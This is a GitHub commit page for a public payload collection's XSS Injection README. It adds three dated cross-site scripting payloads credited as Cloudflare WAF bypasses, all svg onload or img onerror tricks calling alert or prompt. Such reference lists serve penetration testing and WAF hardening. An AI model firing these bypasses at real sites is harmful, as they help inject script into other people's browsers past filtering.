Skip to content

Commit

Permalink
Update Cloudflare XSS bypasses
Browse files Browse the repository at this point in the history
Add 3 bypasses by Bohdan Korzhynskyi. Update twitter
  • Loading branch information
bohdansec authored Apr 21, 2020
1 parent 2615968 commit c4af354
Showing 1 changed file with 21 additions and 1 deletion.
22 changes: 21 additions & 1 deletion XSS Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:`
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
#### 21st april 2020
```html
<svg/OnLoad="`${prompt``}`">
```
#### 22nd august 2019
```html
<svg/onload=%26nbsp;alert`bohdan`+
```
#### 5th jule 2019
```html
1'"><img/src/onerror=.1|alert``>
```
#### 3rd june 2019
```html
<svg onload=prompt%26%230000000040document.domain)>
Expand Down

0 comments on commit c4af354

Please sign in to comment.